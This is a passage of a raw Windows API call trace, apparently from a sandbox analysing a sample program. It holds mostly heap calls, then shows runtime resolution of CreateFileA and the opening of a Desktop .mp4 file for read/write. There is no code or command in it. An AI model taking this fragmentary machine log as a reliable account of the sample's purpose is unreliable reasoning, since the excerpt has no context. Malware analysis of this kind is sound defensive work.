lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.878] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0161.878] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.879] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.879] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.880] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.880] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.880] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.881] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.882] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fe8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.882] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0161.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0161.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.883] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa48008 [0161.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0161.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x32) returned 0x90ad98 [0161.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", cchWideChar=50, lpMultiByteStr=0x90ad98, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", lpUsedDefaultChar=0x0) returned 50 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.883] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iu4ghlu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa48008, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64) returned 0x8e8320 [0161.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa48008, cbMultiByte=50, lpWideCharStr=0x8e8320, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4") returned 50 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa48008 | out: hHeap=0x8a0000) returned 1 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 